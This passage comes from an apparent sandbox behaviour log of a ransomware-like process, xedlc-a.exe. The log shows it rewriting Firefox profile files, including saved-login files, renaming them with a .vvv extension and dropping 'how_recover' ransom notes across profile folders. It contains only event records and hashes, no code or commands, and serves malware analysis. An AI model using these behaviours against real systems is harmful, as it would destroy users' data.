56505.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56506.            ads:
56507.          fid (ads:): 281474976778371
56508.          ntstatus: 0x0
56509.          CreateOptions: 0x0
56510.        file:
56511.          timestamp: 85276
56512.          mode: created
56513.          sequenceNumber: 1399
56514.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\how_recover+utm.html
56515.          processinfo:
56516.            pid: 1056
56517.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56518.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56519.            ads:
56520.          fid (ads:): 281474976778372
56521.          ntstatus: 0x0
56522.          CreateOptions: 0x60
56523.        file:
56524.          timestamp: 85288
56525.          mode: close
56526.          sequenceNumber: 1400
56527.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\how_recover+utm.html
56528.          filesize: 9495
56529.          md5sum: 95f596a25dff51b6af2042b1bbe02985
56530.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
56531.          processinfo:
56532.            pid: 1056
56533.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56534.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56535.            ads:
56536.          fid (ads:): 281474976778372
56537.          ntstatus: 0x0
56538.          CreateOptions: 0x0
56539.        file:
56540.          timestamp: 85296
56541.          mode: open
56542.          sequenceNumber: 1401
56543.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt
56544.          filesize: 1442
56545.          processinfo:
56546.            pid: 1056
56547.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56548.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56549.            ads:
56550.          fid (ads:): 562949953476217
56551.          ntstatus: 0x0
56552.          CreateOptions: 0x60
56553.        file:
56554.          timestamp: 85339
56555.          mode: close
56556.          sequenceNumber: 1402
56557.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt
56558.          filesize: 1870
56559.          md5sum: a00d345060f1beda4324fc4dbb3228fc
56560.          sha1sum: f486f297a818b14e964e52adaa801d6c37125a2b
56561.          processinfo:
56562.            pid: 1056
56563.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56564.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56565.            ads:
56566.          fid (ads:): 562949953476217
56567.          ntstatus: 0x0
56568.          CreateOptions: 0x0
56569.        file:
56570.          timestamp: 85363
56571.          mode: rename
56572.          sequenceNumber: 1403
56573.          filesize: 1870
56574.          md5sum: a00d345060f1beda4324fc4dbb3228fc
56575.          sha1sum: f486f297a818b14e964e52adaa801d6c37125a2b
56576.          processinfo:
56577.            pid: 1056
56578.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56579.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56580.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt
56581.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt.vvv
56582.            ads:
56583.          fid (ads:): 562949953476217
56584.          ntstatus: 0x0
56585.          CreateOptions: 0x0
56586.        file:
56587.          timestamp: 85374
56588.          mode: created
56589.          sequenceNumber: 1404
56590.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\how_recover+utm.txt
56591.          processinfo:
56592.            pid: 1056
56593.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56594.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56595.            ads:
56596.          fid (ads:): 281474976778373
56597.          ntstatus: 0x0
56598.          CreateOptions: 0x60
56599.        file:
56600.          timestamp: 85382
56601.          mode: close
56602.          sequenceNumber: 1405
56603.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\how_recover+utm.txt
56604.          filesize: 2682
56605.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
56606.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
56607.          processinfo:
56608.            pid: 1056
56609.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56610.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56611.            ads:
56612.          fid (ads:): 281474976778373
56613.          ntstatus: 0x0
56614.          CreateOptions: 0x0
56615.        file:
56616.          timestamp: 85393
56617.          mode: created
56618.          sequenceNumber: 1406
56619.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\how_recover+utm.html
56620.          processinfo:
56621.            pid: 1056
56622.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56623.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56624.            ads:
56625.          fid (ads:): 281474976778374
56626.          ntstatus: 0x0
56627.          CreateOptions: 0x60
56628.        file:
56629.          timestamp: 85401
56630.          mode: close
56631.          sequenceNumber: 1407
56632.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\how_recover+utm.html
56633.          filesize: 9495
56634.          md5sum: 95f596a25dff51b6af2042b1bbe02985
56635.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
56636.          processinfo:
56637.            pid: 1056
56638.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56639.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56640.            ads:
56641.          fid (ads:): 281474976778374
56642.          ntstatus: 0x0
56643.          CreateOptions: 0x0
56644.        file:
56645.          timestamp: 85410
56646.          mode: created
56647.          sequenceNumber: 1408
56648.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\how_recover+utm.txt
56649.          processinfo:
56650.            pid: 1056
56651.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56652.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56653.            ads:
56654.          fid (ads:): 281474976778375
56655.          ntstatus: 0x0
56656.          CreateOptions: 0x60
56657.        file:
56658.          timestamp: 85416
56659.          mode: close
56660.          sequenceNumber: 1409
56661.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\how_recover+utm.txt
56662.          filesize: 2682
56663.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
56664.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
56665.          processinfo:
56666.            pid: 1056
56667.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56668.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56669.            ads:
56670.          fid (ads:): 281474976778375
56671.          ntstatus: 0x0
56672.          CreateOptions: 0x0
56673.        file:
56674.          timestamp: 85424
56675.          mode: created
56676.          sequenceNumber: 1410
56677.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\how_recover+utm.html
56678.          processinfo:
56679.            pid: 1056
56680.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56681.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56682.            ads:
56683.          fid (ads:): 281474976778376
56684.          ntstatus: 0x0
56685.          CreateOptions: 0x60
56686.        file:
56687.          timestamp: 85430
56688.          mode: close
56689.          sequenceNumber: 1411
56690.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\how_recover+utm.html
56691.          filesize: 9495
56692.          md5sum: 95f596a25dff51b6af2042b1bbe02985
56693.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
56694.          processinfo:
56695.            pid: 1056
56696.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56697.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56698.            ads:
56699.          fid (ads:): 281474976778376
56700.          ntstatus: 0x0
56701.          CreateOptions: 0x0
56702.        file:
56703.          timestamp: 85439
56704.          mode: created
56705.          sequenceNumber: 1412
56706.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\minidumps\how_recover+utm.txt
56707.          processinfo:
56708.            pid: 1056
56709.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56710.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56711.            ads:
56712.          fid (ads:): 281474976778377
56713.          ntstatus: 0x0
56714.          CreateOptions: 0x60
56715.        file:
56716.          timestamp: 85445
56717.          mode: close
56718.          sequenceNumber: 1413
56719.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\minidumps\how_recover+utm.txt
56720.          filesize: 2682
56721.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
56722.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
56723.          processinfo:
56724.            pid: 1056
56725.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56726.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56727.            ads:
56728.          fid (ads:): 281474976778377
56729.          ntstatus: 0x0
56730.          CreateOptions: 0x0
56731.        file:
56732.          timestamp: 85453
56733.          mode: created
56734.          sequenceNumber: 1414
56735.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\minidumps\how_recover+utm.html
56736.          processinfo:
56737.            pid: 1056
56738.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56739.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56740.            ads:
56741.          fid (ads:): 281474976778378
56742.          ntstatus: 0x0
56743.          CreateOptions: 0x60
56744.        file:
56745.          timestamp: 85461
56746.          mode: close
56747.          sequenceNumber: 1415
56748.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\minidumps\how_recover+utm.html
56749.          filesize: 9495
56750.          md5sum: 95f596a25dff51b6af2042b1bbe02985
56751.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
56752.          processinfo:
56753.            pid: 1056
56754.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56755.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56756.            ads:
56757.          fid (ads:): 281474976778378
56758.          ntstatus: 0x0
56759.          CreateOptions: 0x0
56760.        file:
56761.          timestamp: 85470
56762.          mode: open
56763.          sequenceNumber: 1416
56764.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\prefs.js
56765.          filesize: 6344
56766.          processinfo:
56767.            pid: 1056
56768.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56769.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56770.            ads:
56771.          fid (ads:): 2814749767161115
56772.          ntstatus: 0x0
56773.          CreateOptions: 0x60
56774.        file:
56775.          timestamp: 85504
56776.          mode: close
56777.          sequenceNumber: 1417
56778.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\prefs.js
56779.          filesize: 6766
56780.          md5sum: 9e045e59159857ae73251d67dfa25c9e
56781.          sha1sum: 376ee1f898ae9ff83456a0bf5d1e45d0a3b1586b
56782.          processinfo:
56783.            pid: 1056
56784.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56785.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56786.            ads:
56787.          fid (ads:): 2814749767161115
56788.          ntstatus: 0x0
56789.          CreateOptions: 0x0
56790.        file:
56791.          timestamp: 85514
56792.          mode: rename
56793.          sequenceNumber: 1418
56794.          filesize: 6766
56795.          md5sum: 9e045e59159857ae73251d67dfa25c9e
56796.          sha1sum: 376ee1f898ae9ff83456a0bf5d1e45d0a3b1586b
56797.          processinfo:
56798.            pid: 1056
56799.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56800.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56801.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\prefs.js
56802.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\prefs.js.vvv
56803.            ads:
56804.          fid (ads:): 2814749767161115
56805.          ntstatus: 0x0
56806.          CreateOptions: 0x0
56807.        file:
56808.          timestamp: 85523
56809.          mode: open
56810.          sequenceNumber: 1419
56811.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\sessionstore.js
56812.          filesize: 110
56813.          processinfo:
56814.            pid: 1056
56815.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56816.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56817.            ads:
56818.          fid (ads:): 1407374883608187
56819.          ntstatus: 0x0
56820.          CreateOptions: 0x60
56821.        file:
56822.          timestamp: 85530
56823.          mode: close
56824.          sequenceNumber: 1420
56825.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\sessionstore.js
56826.          filesize: 526
56827.          md5sum: 28699ae747f679dd53eec9817425e2d4
56828.          sha1sum: 3224dd3ae179fea7cf4779c1fd113ab7e5d44edb
56829.          processinfo:
56830.            pid: 1056
56831.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56832.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56833.            ads:
56834.          fid (ads:): 1407374883608187
56835.          ntstatus: 0x0
56836.          CreateOptions: 0x0
56837.        file:
56838.          timestamp: 85540
56839.          mode: rename
56840.          sequenceNumber: 1421
56841.          filesize: 526
56842.          md5sum: 28699ae747f679dd53eec9817425e2d4
56843.          sha1sum: 3224dd3ae179fea7cf4779c1fd113ab7e5d44edb
56844.          processinfo:
56845.            pid: 1056
56846.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56847.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56848.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\sessionstore.js
56849.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\sessionstore.js.vvv
56850.            ads:
56851.          fid (ads:): 1407374883608187
56852.          ntstatus: 0x0
56853.          CreateOptions: 0x0
56854.        file:
56855.          timestamp: 85549
56856.          mode: open
56857.          sequenceNumber: 1422
56858.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\signons2.txt
56859.          filesize: 157
56860.          processinfo:
56861.            pid: 1056
56862.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56863.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56864.            ads:
56865.          fid (ads:): 562949953478841
56866.          ntstatus: 0x0
56867.          CreateOptions: 0x200000
56868.        file:
56869.          timestamp: 85557
56870.          mode: close
56871.          sequenceNumber: 1423
56872.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\signons2.txt
56873.          filesize: 574
56874.          md5sum: 313389f8531ac24cf5485ce138b374dc
56875.          sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
56876.          processinfo:
56877.            pid: 1056
56878.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56879.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56880.            ads:
56881.          fid (ads:): 562949953478841
56882.          ntstatus: 0x0
56883.          CreateOptions: 0x0
56884.        file:
56885.          timestamp: 85569
56886.          mode: rename
56887.          sequenceNumber: 1424
56888.          filesize: 574
56889.          md5sum: 313389f8531ac24cf5485ce138b374dc
56890.          sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
56891.          processinfo:
56892.            pid: 1056
56893.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56894.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56895.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\signons2.txt
56896.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\signons2.txt.vvv
56897.            ads:
56898.          fid (ads:): 562949953478841
56899.          ntstatus: 0x0
56900.          CreateOptions: 0x0
56901.        file:
56902.          timestamp: 85577
56903.          mode: open
56904.          sequenceNumber: 1425
56905.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\signons3.txt
56906.          filesize: 157
56907.          processinfo:
56908.            pid: 1056
56909.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56910.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56911.            ads:
56912.          fid (ads:): 562949953478842
56913.          ntstatus: 0x0
56914.          CreateOptions: 0x200000
56915.        file:
56916.          timestamp: 85587
56917.          mode: close
56918.          sequenceNumber: 1426
56919.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\signons3.txt
56920.          filesize: 574
56921.          md5sum: 313389f8531ac24cf5485ce138b374dc
56922.          sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
56923.          processinfo:
56924.            pid: 1056
56925.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56926.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56927.            ads:
56928.          fid (ads:): 562949953478842
56929.          ntstatus: 0x0
56930.          CreateOptions: 0x0
56931.        file:
56932.          timestamp: 85598
56933.          mode: rename
56934.          sequenceNumber: 1427
56935.          filesize: 574
56936.          md5sum: 313389f8531ac24cf5485ce138b374dc
56937.          sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
56938.          processinfo:
56939.            pid: 1056
56940.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56941.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56942.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\signons3.txt
56943.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\signons3.txt.vvv
56944.            ads:
56945.          fid (ads:): 562949953478842
56946.          ntstatus: 0x0
56947.          CreateOptions: 0x0
56948.        file:
56949.          timestamp: 85610
56950.          mode: created
56951.          sequenceNumber: 1428
56952.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\how_recover+utm.txt
56953.          processinfo:
56954.            pid: 1056
56955.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56956.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56957.            ads:
56958.          fid (ads:): 281474976778379
56959.          ntstatus: 0x0
56960.          CreateOptions: 0x60
56961.        file:
56962.          timestamp: 85618
56963.          mode: close
56964.          sequenceNumber: 1429
56965.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\how_recover+utm.txt
56966.          filesize: 2682
56967.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
56968.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
56969.          processinfo:
56970.            pid: 1056
56971.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56972.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56973.            ads:
56974.          fid (ads:): 281474976778379
56975.          ntstatus: 0x0
56976.          CreateOptions: 0x0
56977.        file:
56978.          timestamp: 85626
56979.          mode: created
56980.          sequenceNumber: 1430
56981.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\how_recover+utm.html
56982.          processinfo:
56983.            pid: 1056
56984.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
56985.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
56986.            ads:
56987.          fid (ads:): 281474976778380
56988.          ntstatus: 0x0
56989.          CreateOptions: 0x60
56990.        file:
56991.          timestamp: 85633
56992.          mode: close
56993.          sequenceNumber: 1431
56994.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\how_recover+utm.html
56995.          filesize: 9495
56996.          md5sum: 95f596a25dff51b6af2042b1bbe02985
56997.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
56998.          processinfo:
56999.            pid: 1056
57000.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57001.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57002.            ads:
57003.          fid (ads:): 281474976778380
57004.          ntstatus: 0x0
57005.          CreateOptions: 0x0
57006.        file:
57007.          timestamp: 85643
57008.          mode: created
57009.          sequenceNumber: 1432
57010.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\bookmarkbackups\how_recover+utm.txt
57011.          processinfo:
57012.            pid: 1056
57013.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57014.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57015.            ads:
57016.          fid (ads:): 281474976778381
57017.          ntstatus: 0x0
57018.          CreateOptions: 0x60
57019.        file:
57020.          timestamp: 85649
57021.          mode: close
57022.          sequenceNumber: 1433
57023.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\bookmarkbackups\how_recover+utm.txt
57024.          filesize: 2682
57025.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
57026.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
57027.          processinfo:
57028.            pid: 1056
57029.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57030.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57031.            ads:
57032.          fid (ads:): 281474976778381
57033.          ntstatus: 0x0
57034.          CreateOptions: 0x0
57035.        file:
57036.          timestamp: 85680
57037.          mode: created
57038.          sequenceNumber: 1434
57039.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\bookmarkbackups\how_recover+utm.html
57040.          processinfo:
57041.            pid: 1056
57042.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57043.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57044.            ads:
57045.          fid (ads:): 281474976778382
57046.          ntstatus: 0x0
57047.          CreateOptions: 0x60
57048.        file:
57049.          timestamp: 85687
57050.          mode: close
57051.          sequenceNumber: 1435
57052.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\bookmarkbackups\how_recover+utm.html
57053.          filesize: 9495
57054.          md5sum: 95f596a25dff51b6af2042b1bbe02985
57055.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
57056.          processinfo:
57057.            pid: 1056
57058.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57059.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57060.            ads:
57061.          fid (ads:): 281474976778382
57062.          ntstatus: 0x0
57063.          CreateOptions: 0x0
57064.        file:
57065.          timestamp: 85696
57066.          mode: open
57067.          sequenceNumber: 1436
57068.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\userChrome-example.css
57069.          filesize: 959
57070.          processinfo:
57071.            pid: 1056
57072.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57073.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57074.            ads:
57075.          fid (ads:): 1125899906897165
57076.          ntstatus: 0x0
57077.          CreateOptions: 0x60
57078.        file:
57079.          timestamp: 85737
57080.          mode: close
57081.          sequenceNumber: 1437
57082.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\userChrome-example.css
57083.          filesize: 1374
57084.          md5sum: eec0ce1de6f93854c185d9e02f849c75
57085.          sha1sum: 8498e8fb19dc5e881a140b560366fcbd93f86595
57086.          processinfo:
57087.            pid: 1056
57088.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57089.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57090.            ads:
57091.          fid (ads:): 1125899906897165
57092.          ntstatus: 0x0
57093.          CreateOptions: 0x0
57094.        file:
57095.          timestamp: 85747
57096.          mode: rename
57097.          sequenceNumber: 1438
57098.          filesize: 1374
57099.          md5sum: eec0ce1de6f93854c185d9e02f849c75
57100.          sha1sum: 8498e8fb19dc5e881a140b560366fcbd93f86595
57101.          processinfo:
57102.            pid: 1056
57103.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57104.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57105.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\userChrome-example.css
57106.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\userChrome-example.css.vvv
57107.            ads:
57108.          fid (ads:): 1125899906897165
57109.          ntstatus: 0x0
57110.          CreateOptions: 0x0
57111.        file:
57112.          timestamp: 85756
57113.          mode: open
57114.          sequenceNumber: 1439
57115.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\userContent-example.css
57116.          filesize: 663
57117.          processinfo:
57118.            pid: 1056
57119.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57120.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57121.            ads:
57122.          fid (ads:): 1125899906897166
57123.          ntstatus: 0x0
57124.          CreateOptions: 0x60
57125.        file:
57126.          timestamp: 85763
57127.          mode: close
57128.          sequenceNumber: 1440
57129.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\userContent-example.css
57130.          filesize: 1086
57131.          md5sum: ae02d7d05a161690eaf51a8f31642b55
57132.          sha1sum: 7e9eda5d3836bff446886164eeb0c5e8c50f1e7d
57133.          processinfo:
57134.            pid: 1056
57135.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57136.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57137.            ads:
57138.          fid (ads:): 1125899906897166
57139.          ntstatus: 0x0
57140.          CreateOptions: 0x0
57141.        file:
57142.          timestamp: 85774
57143.          mode: rename
57144.          sequenceNumber: 1441
57145.          filesize: 1086
57146.          md5sum: ae02d7d05a161690eaf51a8f31642b55
57147.          sha1sum: 7e9eda5d3836bff446886164eeb0c5e8c50f1e7d
57148.          processinfo:
57149.            pid: 1056
57150.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57151.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57152.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\userContent-example.css
57153.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\userContent-example.css.vvv
57154.            ads:
57155.          fid (ads:): 1125899906897166
57156.          ntstatus: 0x0
57157.          CreateOptions: 0x0
57158.        file:
57159.          timestamp: 85835
57160.          mode: created
57161.          sequenceNumber: 1442
57162.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\how_recover+utm.txt
57163.          processinfo:
57164.            pid: 1056
57165.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57166.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57167.            ads:
57168.          fid (ads:): 281474976778383
57169.          ntstatus: 0x0
57170.          CreateOptions: 0x60
57171.        file:
57172.          timestamp: 85841
57173.          mode: close
57174.          sequenceNumber: 1443
57175.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\how_recover+utm.txt
57176.          filesize: 2682
57177.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
57178.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
57179.          processinfo:
